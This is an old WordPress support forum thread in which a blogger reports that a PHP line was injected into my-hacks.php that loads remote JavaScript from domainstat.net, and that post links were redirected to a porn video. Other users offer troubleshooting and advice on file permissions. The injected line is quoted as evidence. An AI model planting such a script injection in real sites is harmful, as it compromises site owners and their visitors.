WordPress.org

Ready to get started?Download WordPress

Forums

WP Hacked Twice (66 posts)

  1. OrchidRed
    Member
    Posted 8 years ago #

    My site has been hacked twice this month and I can't figure out how. It begins with my-hacks.php, where WP tells me that there headers were already sent. Opening my-hacks reveals that this bit of code has somehow been added to the file:

    <? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>";}?>

    Deleting that bit of code causing all my plugin and admin.php files to stop working and stylsheet.css stops working. The last time this happened the hack got progressively worse, eventually changing all my post links to a new link that sent people to a hardcore porno video.

    How is this happening? Anyone know how I can prevent it? Fix it?? HELP!!

  2. moshu
    Member
    Posted 8 years ago #

    Upgrade?

  3. OrchidRed
    Member
    Posted 8 years ago #

    I'm already using the most recent version of WP. Initially they hacked my personal blog at http://www.themutteringmuse.com so my host company moved me to a new server. But now they have hacked both my personal blog and my photoblog at theshapeoflight.com. I'm really at a loss here.

  4. OrchidRed
    Member
    Posted 8 years ago #

    I'm already using the most recent version of WP. Initially they hacked my personal blog at http://www.themutteringmuse.com so my host company moved me to a new server. But now they have hacked both my personal blog and my photoblog at theshapeoflight.com. I'm really at a loss here.

  5. Cypher
    Member
    Posted 8 years ago #

    Some details, what version of WP, PHP and Apache? Ask your host about possible break-in's. A lot of times, inappropriate security across users on a shared hosting can allow for such hacks.

    Regards

  6. moshu
    Member
    Posted 8 years ago #

    From your source code:
    <title>The Shape of Light</title>
    <meta name="generator" content="WordPress 1.5.1.2" />

    Not really "the most recent"...

  7. moshu
    Member
    Posted 8 years ago #

    From your source code:
    <title>The Shape of Light</title>
    <meta name="generator" content="WordPress 1.5.1.2" />

    Not really "the most recent"...

  8. OrchidRed
    Member
    Posted 8 years ago #

    I'm running WP 1.5.2 Strayhorn. PHP version 4.4.1. Apache version 1.3.34 (Unix).

    The first time my site was hacked my host company thought that it was because I was using the CodeGRRL calender script, which was recently exploited by hackers. But then they moved me to a new server, we deleted ALL non WP files. We just got my sites back up and running last night and now they've been hacked again. :( I'm tempted to just give up on my sites, I worked SO hard to get them back up and running. :sob:

  9. OrchidRed
    Member
    Posted 8 years ago #

    Moshu, when I log into WP it tells me its WP 1.2.

    The header probably isn't correct because I pasted it from an earlier template that was running on 1.5.1.2.

  10. moshu
    Member
    Posted 8 years ago #

    Wp 1.2? That's even worse. The latest stable is 1.5.3

  11. OrchidRed
    Member
    Posted 8 years ago #

    Moshu: Sorry, I meant WP 1.5.2 Strayhorn. I'm really flustered right now.

    I'm running WP 1.5.2 Strayhorn. PHP version 4.4.1. Apache version 1.3.34 (Unix).

  12. moshu
    Member
    Posted 8 years ago #

    And I have to apologize, too.
    The latest is 1.5.2. Sorry.

  13. orlo
    Member
    Posted 8 years ago #

    this seems indeed a little bit worrying. Since reading these posts I got confused abiout which version you exactly use. Probably it's best to first check your xmlrpc.php file.
    Just in case (it's still form the old version)

    For the jvascript included there seems to be a quick work around... but we need to find the whole/problem they are using...

  14. OrchidRed
    Member
    Posted 8 years ago #

    Orlo, the info I posted is correct, its WP 1.5.2 Strayhorn. I just made a mistake when responded to Moshu because I was really upset as I was typing.

    Well, even if I delete the javascript (which I did on one site) all the WP files themselves are now having problems. I tried replacing them with new ones by reuploading WP, but that didnt fix the problem.

    For example, one error I'm getting is:

    Warning: Cannot modify header information - headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 10

    Warning: Cannot modify header information - headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 11

    Warning: Cannot modify header information - headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 12

    Warning: Cannot modify header information - headers already sent by (output started at /home/akakestr/public_html/muse/wp-content/plugins/friendlycomments.php:52) in /home/akakestr/public_html/muse/wp-admin/admin.php on line 13

    And I just replaced this file.

  15. OrchidRed
    Member
    Posted 8 years ago #

    Also, I should note that deactivating plugins doesn't change anything, it just causes new errors with other files.

  16. orlo
    Member
    Posted 8 years ago #

    I'll try to get in touch with you via email. Although I think if you are really using the latest version- there might be a bigger problem. A quick search on google revealed that more people are having a similar problem. Found a wordpress 1.2.2 (see report here:
    http://board.thefanlistings.org/index.php?showtopic=47631)
    anothe report here: http://forum.powweb.com/showthread.php?p=345602 and
    someone on: PostNuke 0.7.6.1

  17. whooami
    Member
    Posted 8 years ago #

    fyi, your blog site .. the permalinks as well as the comment links are prompting me to download a .wmv file (windows media file) and nope I'm not up for being a guinie pig and seeing what it is. I appear to be doing this as youre messing with things since it has just stopped but looking at your source it looks like you put back the snippit of js in the header, as they all apeear to be working as normally, but loading rather slow.

    By the way, these sorts of javascript issues are becoming a reoccurring topic on the forums, again :

    NO FILES SHOULD BE CHMOD 666 OR 777 AS A RULE (ON ANY SITE, REGARDLESS OF WHAT SOFTWARE OR APPLICATIONS YOU ARE USING).

    WordPress allows you to edit files via the admin area, but trust me when I say that thats a huge issue as that requires word-writable files. If you are insistent on editing files that way, it is best that you do it, and then chmod any files you edited back to the correct permissions (644 or 755, respectively).

    It's worth noting also that wp-cache, I presume, requires a whole directories worth of files be world-writable.

  18. OrchidRed
    Member
    Posted 8 years ago #

    --- deleted, duplicate post ----

  19. OrchidRed
    Member
    Posted 8 years ago #

    Whooami, that wmv file is a porno video, that's the same thing that happened the last time my site was hacked.

    As for messing with the site, that's really disturbing that you said files are changing because I haven't done anything to it since starting this thread. The only thing I did (before posting here) was delete the js, but it reappeared soon afterwards.

  20. OrchidRed
    Member
    Posted 8 years ago #

    Orlo, yes please do email me. I can be reached at amadai at gmail dot com.

  21. OrchidRed
    Member
    Posted 8 years ago #

    whooami, good to know. I'm definately not going to edit files in WP anymore.

  22. whooami
    Member
    Posted 8 years ago #

    OrchidRed, I know.. which is why Im not guinie pig it..Good luck, Im afraid its snowing, and I am off to work..

  23. TechGnome
    Moderator
    Posted 8 years ago #

    Have you looked to see if there's an .htaccess file? Some one may have dumped one there that's causing the redirects to the wmv file. it's just a guess though.

    -tg

  24. vkaryl
    Member
    Posted 8 years ago #

    Two possibles spring to mind, kestrel. Either you have totally pissed off the world's greatest hacker (hopefully not, but if that's it I don't think we can help you!); or your host has some sort of security problem of their own (or a dodgy employee - not really likely, but has been known to happen....)

    If they put you on a new server, and you had nothing there BUT WP 1.5.2 (which so far and crossing fingers hasn't any obvious open sores far as vulnerabilities go), it's perhaps time to ask them again if they have a problem somewhere....

    TG has a good point as well: because if your first-hacked install was due to someone dropping a dirty .htaccess in your folder, you might have moved it along with your blog when you moved to the new server.

    Also, have you used phpMyAdmin to look at your database, to see if there are tables which don't belong there?

  25. orlo
    Member
    Posted 8 years ago #

    I talked to kestrel - and it seems the provider has a bigger problem... the log file shows that some script is spreading across different clients/users on the same server- so I am not really sure if WP was the problem to start with... but changing the access rights should help a little... I think the provider will eventually figure it out :-D

    seems like they are responding fast...

    as i said before- seems like a couple of servers are affected (see google)...

  26. vkaryl
    Member
    Posted 8 years ago #

    Ouch. Thanks for the report, orlo. Any chance you or kestrel would be willing to state which host, in case there are others who will be looking for info on the problem?

  27. moshu
    Member
    Posted 8 years ago #

    Among "others" consider this guy:
    http://wordpress.org/support/topic/50701#post-278892

  28. orlo
    Member
    Posted 8 years ago #

    the provider is looking at the issue on a general level - at least that was my understanding- they found a log file (created by the malicious script which listed all files that where infected... seems like they are going through their servers right now...
    maybe kestrel can tell you more as sson as they are done...

  29. Righton
    Member
    Posted 8 years ago #

    So if I email my host about this, they should be able to assist me you think?

    My issue is I have one of these scripts in front of my DOCTYPE, and it's not visible in the template file... I can't find it anywhere.

  30. OrchidRed
    Member
    Posted 8 years ago #

    Hi all, sorry for not responding sooner I was at work and didn't have computer access.

    My host thinks there is a file somewhere in the root folder of my server and that it has been systematically rewriting every WP file on the _entire_ server, so it's not just my account. They think this is the case because they found a txt file that has been logging all the files that have been corrupted.

    It seems like it only rewrites WP files because non-WP php files haven't been affected. (We're guessing that it exploits the fact that many of them were CHMOD to 666 like whooami said?) It completely messes up the admin panel and turns comments/permalinks into links to a wmv porno file.

    That's all I know. My host temporarily stopped the attack by freezing some folders, but they haven't been able to find the file that is responsible for all this.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.